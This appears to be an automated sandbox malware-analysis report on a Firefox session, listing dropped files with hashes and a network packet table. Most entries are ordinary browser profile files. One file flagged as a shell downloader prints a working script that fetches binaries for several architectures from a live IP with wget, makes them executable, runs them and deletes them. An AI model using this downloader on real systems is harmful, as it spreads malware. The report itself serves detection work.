/home/james/.cache/mozilla/firefox/5zxot757.default/startupCache/urlCache-new.bin

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	1534
Entropy (8bit):	4.751994770701492
Encrypted:	false
SSDEEP:	24:wbKaVKXoaKMfmS0gn41nsD3GtMeXUGc3VhWu5JrZmmKVgd5sb7dfd5ldAi0:HaMXoDu6XULWaJrQ/QsnVng
MD5:	F2500562251A0F656922E369C506CA48
SHA1:	DFEECB2036AB6DA9815687453F692B813BBC65BD
SHA-256:	627D549C697FCA2B4A5320619AE703A984E600E5D0AC083B34178862AA04B6F3
SHA-512:	D3D9BA2B25ED1BE1EB758DD148447CEB17E07D3BA6B11B547C98F3F318C24A83A8747A407E7D4B33053A417541DCDE6EDC743F63C57DF840B8BECF7A1658797C
Malicious:	false
Reputation:	low
Preview:	mozURLcachev002......-.chrome/en-US/locale/branding/brand.properties.6./home/james/.mozilla/firefox/5zxot757.default/prefs.js.5./home/james/.mozilla/firefox/5zxot757.default/user.js.+./usr/lib/firefox/distribution/policies.json.3.chrome/browser/content/browser/built_in_addons.json.C./home/james/.mozilla/firefox/5zxot757.default/addonStartup.json.lz4.3.chrome/en-US/locale/en-US/global/plugins.properties.6.chrome/en-US/locale/en-US/global/extensions.properties.$.chrome/toolkit/res/counterstyles.css...chrome/toolkit/res/html.css.-.chrome/toolkit/content/global/minimal-xul.css...chrome/toolkit/res/quirk.css...res/svg.css.%.chrome/toolkit/content/global/xul.css...chrome/toolkit/skin/classic/global/tooltip.css...chrome/toolkit/res/ua.css...chrome/toolkit/res/mathml.css...chrome/toolkit/res/noscript.css...chrome/toolkit/res/forms.css.1.chrome/toolkit/skin/classic/global/scrollbars.css.$.chrome/toolkit/res/pluginproblem.css.../usr/lib/firefox/distribution/distribution.ini...chrome/en-US/locale

/home/james/.cache/mozilla/firefox/5zxot757.default/startupCache/webext.sc.lz4.tmp

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	87458
Entropy (8bit):	6.216346278154541
Encrypted:	false
SSDEEP:	1536:X5vK21wGeN4Z/tCww3+6R2/HuFbtjA/76+u8XO+MVUfwxFPd5:XZK2GGeN41w0Qx860HMiwvn
MD5:	EE351934F0AD50ADDA13E8A1340301B0
SHA1:	866D3AF8B61E111DFFC6E3E76DE9BA7D689736FC
SHA-256:	BCBF3225F297DAB785B06A469F3C6BA50B11F3607967584AFEF451883F2BC56E
SHA-512:	C89FD26A8FE885597C2ECA1EBAF85761CE549B35C83DDE5E18E25F29E7286F08914CDD49031C0CFAAB2382E432082E9007407B436DCF6A4DC1E7455EEC4C771F
Malicious:	false
Reputation:	low
Preview:	mozJSSCLz40v001...............................manifests ....S..... ...formautofill@mozilla.orgH...(.21.0=..`.....Qen-US..s.........qapiNamew.1.....S..... ..dependenci$..(...(."id.......x........p..application... ....Rgecko...............strict_max_versionU....,..(./in(....P..update_urlA.....P..X...0.cauthor'.C........browser_specific_setting.....3...0..descript...P.{homepag..3...@..........S..... ..name.......cForm A..C......dshort_.....3... ..e...... ..backgrounH..... ..persistent......`....ss.............B...`..3.o.z.-.e.x.t.e.n.s.i.o.n.:././.5.0.d.7.6.b.8.e.-.8.d.3.b.-.4.7.5.7....5.1.6.-.c.d.6.6.5.8....c.7.4.5./.b.a.c.k.g.r.o.u.n.d...j.......S........content_....... ..ecurity_policy'..H..develope[.....x.Shidde....X.'icq..P..incognitt.....spanning....minimum_chromeN..}..P...(.\opera'.C....(..o...al_permiss....... ..0.As_uiq.....(..G...(...h...web_accessible_resourc............_overrid)....3........(ac.....scommand..$..p..devtools_pag........qomnibox.....;agem..`....nsideba........?ur

/home/james/.mozilla/firefox/5zxot757.default/addonStartup.json.lz4.tmp

Download File

Process:	/usr/lib/firefox/firefox
File Type:	Mozilla lz4 compressed data, originally 1426 bytes
Category:	dropped
Size (bytes):	638
Entropy (8bit):	6.058376992808135
Encrypted:	false
SSDEEP:	12:vkIb3bQPnkKNuN7Xnwutjp/Ai8AXyIF9nfvER9lyNinNii1ABHM6+ztbuEv2Ge:v5r4mNrnwunjR9filyNIii2sdVL7e
MD5:	C03070F8A39B68E1DF90C197530147B8
SHA1:	CA5D078F9FE04FA46AF10505F930F1F67DEA4314
SHA-256:	FB1ABAC28102E4FD1F7CD97C8B4135681C9BD4BA0EF1517895B278DB52BF5256
SHA-512:	26F8A7162835574D22C0AF33AD8F1EE1F1C24F473FD54C835D8DD512C0F26B4F30EBC9F0AE2DE6C8CA3EA92D0402867271B3CA29197B6ED141527EC4FA8200B6
Malicious:	false
Reputation:	low
Preview:	mozLz40.......{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1554899853000,"loader":null,"path":s.....xpi","runInSafeModej..telemetryKeyC.7%40....:1.0","version":"...},"screenshots..T.r.......B....K35.0......startupData...p..astentL..!er..Arunt....{"onMessage":[[]]}}}},"webcompat-reporter7..Ofals..&.z...?...I..F. 1....-..............)....p....!...Y3.0.2......'...webRequest..BeforeSendHe......[{"tabId..0typ0....0url$.U"://...-....-testcases.schub.io/"],"windowQ..},["blocking........?]],......directvnow.comn.!....P.0tag..%{}..../usr/lib/firefox/browser/features"}}

/home/james/.mozilla/firefox/5zxot757.default/broadcast-listeners.json.tmp

Download File

Process:	/usr/lib/firefox/firefox
File Type:	JSON data
Category:	dropped
Size (bytes):	204
Entropy (8bit):	4.54883533637465
Encrypted:	false
SSDEEP:	6:YWLSf85jcM2MAfeKSBDuQ6s/WoMmgjwHbSRmnPE2cb:YWLSf6gMAfzSBDNFMmqmpncBb
MD5:	72C95709E1A3B27919E13D28BBE8E8A2
SHA1:	00892DECBEE63D627057730BFC0C6A4F13099EE4
SHA-256:	9CF589357FCEEA2F37CD1A925E5D33FD517A44D22A16C357F7FB5D4D187034AA
SHA-512:	613CA9DD2D12AFE31FB2C4A8D9337EEECFB58DABAEAABA11404B9A736A4073DFD9B473BA27C1183D3CC91D5A9233A83DCE5A135A81F755D978CEA9E198209182
Malicious:	false
Reputation:	low
Preview:	{"version":1,"listeners":{"remote-settings/monitor_changes":{"version":"\"0\"","sourceInfo":{"moduleURI":"resource://services-settings/remote-settings.js","symbolName":"remoteSettingsBroadcastHandler"}}}}

/home/james/.mozilla/firefox/5zxot757.default/cert9.db

Download File

Process:	/usr/lib/firefox/firefox
File Type:	SQLite 3.x database, last written using SQLite version 3026000, page size 32768, file counter 4, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	458752
Entropy (8bit):	0.4273871468201971
Encrypted:	false
SSDEEP:	384:9ozkVmvQhyn+ZooiwJtKZYcMM0cXozkVmvQhyn+ZoojwJtKZYcMM0tyw:9owJtgYcMKJwJtgYcMV
MD5:	B8951CD8C042AD6AA19C3618ABAACE75
SHA1:	31A007085AA1CC981EC0700B72D16264396780A9
SHA-256:	11EE5EDBA5FA05F3EAF11E678330E001F0D0B16F04430F23A47BF9E469480FBD
SHA-512:	856DD70F7235951267C6C955317264C23B122ACD358419D8472928180EA70112CFE4E1A4B7F73B97AE3B65CCBDC0F36BB493CEEBE34B58BA78A09A41AF82A152
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................,P.....z..\|...{.{.{@z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/home/james/.mozilla/firefox/5zxot757.default/cert9.db-journal

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	459912
Entropy (8bit):	0.35327624612386926
Encrypted:	false
SSDEEP:	384:2ZYcMM0eSozkVmvQhyn+ZooUtwJtKZYcMM0fCozkVmvQhyn+ZooK:8YcMhawJtgYcMek
MD5:	BD7A20000578B8487B31530A4E6D8729
SHA1:	37C58BD33CAA8AB06CE443F00635AE3A4B6E1DDC
SHA-256:	DA1FF7BCB3B8A1711CD48D01625719A85B7AC832E060012E32BFBFE8D4799CF2
SHA-512:	0DB9B0189A0759DA91F8E143E913F7BA03497D1E3C18EC8691F9534A823D72D416FCA9BEBB5AA135B18FD1A3AA8EAF8169FB4B16BFFB1F3C5786E94E4D36839D
Malicious:	false
Reputation:	low
Preview:	..............60........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/home/james/.mozilla/firefox/5zxot757.default/key4.db

Download File

Process:	/usr/lib/firefox/firefox
File Type:	SQLite 3.x database, last written using SQLite version 3026000, page size 32768, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.393068665600066
Encrypted:	false
SSDEEP:	192:mJLvKXzkVmvQhyn+ZoQfqlQbGhMHPaVAL23v8u5t7lZ:mJLozkVmvQhyn+ZoouFZ
MD5:	1B1FF9DF2499555994055E5D2A876230
SHA1:	B5A73606ED21B9ECCB85E09A15002E8CE9809471
SHA-256:	A1BFE7C4A28C75218F761BA847B37F399B0096A708FC255BF7B9CFA785411105
SHA-512:	CFFD5D8AFE16C1326A12C8768186CEF27412DFF12BC2A13C7A14CF28E37767F7A961E3D398E5653E0192987E74935BEF66B5F8E036E37EB9DFA0A34F0B1C8E26
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................,P.....zR.\|...{.{w{5z.zRz.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/home/james/.mozilla/firefox/5zxot757.default/key4.db-journal

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	98852
Entropy (8bit):	0.21414480170543426
Encrypted:	false
SSDEEP:	192:PN5JLvKXzkVmvQhyn+ZoQfqlQbGhMHPaVAL23v8r:F5JLozkVmvQhyn+Zoor
MD5:	050A32D7986B64917775F64C9045E233
SHA1:	2A66B5EC42F68046715EE1312D21214367F7FD0D
SHA-256:	178158FB91C523D35FAC630CF28BF5035D1C875AE6F1514D441B5961435001C9
SHA-512:	02C116309985C12076DB548853CD58A821419A729E65432A844D883BB82BAF2494C364DC7D055376D6559F370451DF5B5A0D6FCD4F1D12FF64DFDE180AB2B768
Malicious:	false
Reputation:	low
Preview:	............c~.*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/home/james/.mozilla/firefox/5zxot757.default/permissions.sqlite

Download File

Process:	/usr/lib/firefox/firefox
File Type:	SQLite 3.x database, user version 9, last written using SQLite version 3026000, page size 32768, file counter 5, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.09611120034147747
Encrypted:	false
SSDEEP:	12:DBl/Wlb9gPxRymgObsCVR49wcYR4fmnsCVR4aR:DLwZah76wd4+X
MD5:	3EC564DFFB31A761D90CC78B79A12619
SHA1:	179B48158BB8B9FAB1422D40C9B0618307AC0C5B
SHA-256:	18A9301EDE2C87FC24D9CE4EB1DC710DE2CD13C9DC57C46B0D88F08F8EC0CB91
SHA-512:	5081DA75330182C57DE2D4CDE5FFB484E0049ECE32810889127A4900D3A3D0BB289A59EEBE1D43022F19AC7307C7146D94D7AF4B97288BBA38500A32957980DC
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................,P.....~e..F~e........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/home/james/.mozilla/firefox/5zxot757.default/permissions.sqlite-journal

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	66076
Entropy (8bit):	0.11246367217374252
Encrypted:	false
SSDEEP:	12:C3P8bPGjQ6Bl/AYlk9gPxRymgObsCVR49wcYR4fmnsCVR4P9:SkjGjQ6L9lMah76wd4+g9
MD5:	BCA42B097D40A15723D7B074F6591CD1
SHA1:	918B54729004C76C2A1F9E650AA56A736C00E2A5
SHA-256:	9F0DA876BC602EB7043D7DC44D32FAD00E8274C8525F60571D084FCFB74AF37C
SHA-512:	F73DE3319354CBE1BE100F2C105A336621E1A8FD7CCB5BB60DBCEDF5EA1582A63FBA0BFC3AB8248F0754E1C5DB85176F02E888F2B5BF28D393842D27D21415ED
Malicious:	false
Reputation:	low
Preview:	..............\|}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/home/james/.mozilla/firefox/5zxot757.default/prefs-1.js

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with very long lines (663)
Category:	dropped
Size (bytes):	33508
Entropy (8bit):	5.176541823079957
Encrypted:	false
SSDEEP:	384:BDG51pz2DzqNDGo1pz2JzqNDGo1pz2wzqNDGoVpz2wzqNDGoZpz2wzq1:Ml9LFeF+F61
MD5:	A41F34DC5864D25A2AE22A851E967C44
SHA1:	402ABB73B83A8925A74AC3CEFD9347E71A171186
SHA-256:	B48E35244EE2DC89047B2B5C3A5A8D9583F2290B77081202268FFBC7D31E5C93
SHA-512:	D23643F73AD10EA532EA119D2277A574FAD9019322FA1046305E61E5F5755C0AE4808C956FE502AD171C35276F230504C6DE6CD5A26029773F3A51650B657DDB
Malicious:	false
Reputation:	low
Preview:	// Mozilla User Preferences..// DO NOT EDIT THIS FILE..//.// If you make changes to this file while the application is running,.// the changes will be overwritten when the application exits..//.// To change a preference value, you can either:.// - modify it via the UI (e.g. via about:config in the browser); or.// - set it within a user.js file in your profile...user_pref("app.normandy.first_run", false);.user_pref("app.normandy.startupExperimentPrefs.dom.push.alwaysConnect", false);.user_pref("app.normandy.startupRolloutPrefs.media.autoplay.default", 1);.user_pref("app.normandy.user_id", "deb21830-19ac-4c3a-a05f-f7f80e818647");.user_pref("app.update.lastUpdateTime.addon-background-update-timer", 0);.user_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 0);.user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1556631169);.user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 0);.user_pref("app.update.lastUpdateTime.search-engine-update-timer", 0)

/home/james/.mozilla/firefox/5zxot757.default/sessionCheckpoints.json.tmp

Download File

Process:	/usr/lib/firefox/firefox
File Type:	JSON data
Category:	dropped
Size (bytes):	143
Entropy (8bit):	4.223691028533093
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+ABaQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+kOy6Lb1BA+m2L69Yr
MD5:	C0E4C22C50DD21142F57714EF49B8713
SHA1:	06B77307DCA5C889EA279243E74730CBC10801BE
SHA-256:	6FE46B65B76B3DF32D8392853740B35ED75B6E23F4FBD6F45F3EFA1D496E6717
SHA-512:	A4516B4F15EDB429F7B8CE3EA709D3777BFCC590838B1E113147E6BFB4DF0F34F0F2B24F6185D4E4277A77F75711BB470461B86AA507921AF037A6D22DF9278E
Malicious:	false
Reputation:	low
Preview:	{"profile-after-change":true,"final-ui-startup":true}{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

/proc/4884/gid_map

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	1.4353713907745331
Encrypted:	false
SSDEEP:	3:MVUGn:MCG
MD5:	54258652109C33FE06188083A3EC23F4
SHA1:	013EC30A95D66C56642C193613A829B746982601
SHA-256:	C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
SHA-512:	AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
Malicious:	false
Reputation:	low
Preview:	1000 1000 1

/proc/4884/setgroups

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9n:9n
MD5:	05AFB6CE69B9CEF1BD6ECE7E4745F96C
SHA1:	1D16DC2DCC6851208C1B981E2EC377250A4A0CC5
SHA-256:	3026A0CA485E5831657BA0120FA8DD66B3425427BFB0A2BE0DB743E2305CC7C5
SHA-512:	A37A7790CCB2FA5A3C3F2740480CF4035F2870502060F398A1882A44B675DE736E33D8ECD9B834BB3D19D807B46875E30AA835EDD847C5FE8F1F2942A870BAD5
Malicious:	false
Reputation:	low
Preview:	deny

/proc/4884/uid_map

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	1.4353713907745331
Encrypted:	false
SSDEEP:	3:MVUGn:MCG
MD5:	54258652109C33FE06188083A3EC23F4
SHA1:	013EC30A95D66C56642C193613A829B746982601
SHA-256:	C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
SHA-512:	AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
Malicious:	false
Reputation:	low
Preview:	1000 1000 1

/proc/4973/gid_map

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	1.4353713907745331
Encrypted:	false
SSDEEP:	3:MVUGn:MCG
MD5:	54258652109C33FE06188083A3EC23F4
SHA1:	013EC30A95D66C56642C193613A829B746982601
SHA-256:	C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
SHA-512:	AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
Malicious:	false
Reputation:	low
Preview:	1000 1000 1

/proc/4973/setgroups

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9n:9n
MD5:	05AFB6CE69B9CEF1BD6ECE7E4745F96C
SHA1:	1D16DC2DCC6851208C1B981E2EC377250A4A0CC5
SHA-256:	3026A0CA485E5831657BA0120FA8DD66B3425427BFB0A2BE0DB743E2305CC7C5
SHA-512:	A37A7790CCB2FA5A3C3F2740480CF4035F2870502060F398A1882A44B675DE736E33D8ECD9B834BB3D19D807B46875E30AA835EDD847C5FE8F1F2942A870BAD5
Malicious:	false
Reputation:	low
Preview:	deny

/proc/4973/uid_map

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	1.4353713907745331
Encrypted:	false
SSDEEP:	3:MVUGn:MCG
MD5:	54258652109C33FE06188083A3EC23F4
SHA1:	013EC30A95D66C56642C193613A829B746982601
SHA-256:	C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
SHA-512:	AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
Malicious:	false
Reputation:	low
Preview:	1000 1000 1

/proc/5011/gid_map

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	1.4353713907745331
Encrypted:	false
SSDEEP:	3:MVUGn:MCG
MD5:	54258652109C33FE06188083A3EC23F4
SHA1:	013EC30A95D66C56642C193613A829B746982601
SHA-256:	C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
SHA-512:	AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
Malicious:	false
Reputation:	low
Preview:	1000 1000 1

/proc/5011/setgroups

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9n:9n
MD5:	05AFB6CE69B9CEF1BD6ECE7E4745F96C
SHA1:	1D16DC2DCC6851208C1B981E2EC377250A4A0CC5
SHA-256:	3026A0CA485E5831657BA0120FA8DD66B3425427BFB0A2BE0DB743E2305CC7C5
SHA-512:	A37A7790CCB2FA5A3C3F2740480CF4035F2870502060F398A1882A44B675DE736E33D8ECD9B834BB3D19D807B46875E30AA835EDD847C5FE8F1F2942A870BAD5
Malicious:	false
Reputation:	low
Preview:	deny

/proc/5011/uid_map

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	1.4353713907745331
Encrypted:	false
SSDEEP:	3:MVUGn:MCG
MD5:	54258652109C33FE06188083A3EC23F4
SHA1:	013EC30A95D66C56642C193613A829B746982601
SHA-256:	C459EBB6CF3917EFB05A2E72EF25E223BE9B78780B1CE0CAACCE49C773DF199E
SHA-512:	AAE8A67B91BDEC9C21ACD88711C262EA3ACD3EE086AEB27645531C47DD618708C7FF284759A68000414579B77C0D8A3449F95480D039A9901F7352121B7D78F0
Malicious:	false
Reputation:	low
Preview:	1000 1000 1

/tmp/mozilla_james0/uNEX60sH.sh.part

Download File

Process:	/usr/lib/firefox/firefox
File Type:	ASCII text
Category:	dropped
Size (bytes):	2049
Entropy (8bit):	4.677511553484704
Encrypted:	false
SSDEEP:	48:1knth4tlkVhaLaMalsyHdHp4H/9Jc9QrQfk+ja1psfQ/YlkdBA/FWkAszbsYlkdW:1Eth4tlchaLaMalsIdpelJc9QrQfk+jH
MD5:	07EEE4921AE96004E05280F4FF86E701
SHA1:	8E4A617AE1D6B0BBBC037EF5988E1B45C6E0F1EB
SHA-256:	17FBE320C58C8AE65BEFA84A62946C3824E79A7A1F2029CA6C8F94CAE22A5709
SHA-512:	4C4F50DB407827F638F93E29EA5FC4D00DCD5325B831514BC928FA6D60E1D480899085B44E64AC90FC492D672492F058810DD680473AB7D8C323ACDC55AAF069
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ShellDownloader, Description: Yara detected ShellDownloader, Source: /tmp/mozilla_james0/uNEX60sH.sh.part, Author: Joe Security
Reputation:	low
Preview:	-e #!/bin/bash.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/m-i.p-s.ISIS; chmod +x m-i.p-s.ISIS; ./m-i.p-s.ISIS; rm -rf m-i.p-s.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/m-p.s-l.ISIS; chmod +x m-p.s-l.ISIS; ./m-p.s-l.ISIS; rm -rf m-p.s-l.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/s-h.4-.ISIS; chmod +x s-h.4-.ISIS; ./s-h.4-.ISIS; rm -rf s-h.4-.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/x-8.6-.ISIS; chmod +x x-8.6-.ISIS; ./x-8.6-.ISIS; rm -rf x-8.6-.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/a-r.m-6.ISIS; chmod +x a-r.m-6.ISIS; ./a-r.m-6.ISIS; rm -rf a-r.m-6.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/x-3.2-.ISIS; chmod +x x-3.2-.ISIS; ./x-3.2-.ISIS; rm -rf x-3.2-.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 25, 2024 08:04:11.233541012 CET	58476	80	192.168.2.20	167.114.127.95
Dec 25, 2024 08:04:11.353187084 CET	80	58476	167.114.127.95	192.168.2.20
Dec 25, 2024 08:04:11.353259087 CET	58476	80	192.168.2.20	167.114.127.95
Dec 25, 2024 08:04:11.817378998 CET	58476	80	192.168.2.20	167.114.127.95
Dec 25, 2024 08:04:11.936949968 CET	80	58476	167.114.127.95	192.168.2.20
Dec 25, 2024 08:04:12.457882881 CET	80	58476	167.114.127.95	192.168.2.20
Dec 25, 2024 08:04:12.457952976 CET	58476	80	192.168.2.20	167.114.127.95
Dec 25, 2024 08:04:12.457969904 CET	80	58476	167.114.127.95	192.168.2.20
Dec 25, 2024 08:04:12.458017111 CET	58476	80	192.168.2.20	167.114.127.95
Dec 25, 2024 08:04:17.463167906 CET	80	58476	167.114.127.95	192.168.2.20
Dec 25, 2024 08:04:17.463655949 CET	58476	80	192.168.2.20	167.114.127.95
Dec 25, 2024 08:04:17.583246946 CET	80	58476	167.114.127.95	192.168.2.20
Dec 25, 2024 08:04:31.684576988 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:31.684612989 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:31.684676886 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:31.687911987 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:31.687923908 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:32.916315079 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:32.917090893 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:32.922627926 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:32.922646046 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:32.922801018 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:32.923429012 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:32.923444986 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:32.962133884 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:33.395881891 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:33.395987034 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:33.396008968 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:33.396099091 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:33.396157026 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:33.402288914 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:33.402311087 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:33.402323961 CET	43788	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:33.402329922 CET	443	43788	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:38.528228045 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:38.528258085 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:38.528321028 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:38.531045914 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:38.531059980 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:39.746057034 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:39.746285915 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:39.749741077 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:39.749752045 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:39.749947071 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:39.752180099 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:39.795387983 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:40.237086058 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:40.237329960 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:40.243355036 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:40.243516922 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:40.244021893 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:40.244049072 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:40.244062901 CET	43792	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:40.244067907 CET	443	43792	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:50.376585960 CET	43794	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:50.376646042 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:50.376698017 CET	43794	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:50.377518892 CET	43794	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:50.377537012 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:51.592487097 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:51.592675924 CET	43794	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:51.596426964 CET	43794	443	192.168.2.20	34.107.243.93
Dec 25, 2024 08:04:51.596441984 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:51.596539021 CET	443	43794	34.107.243.93	192.168.2.20
Dec 25, 2024 08:04:51.599232912 CET	43794	443	192.168.2.20	34.107.243.93
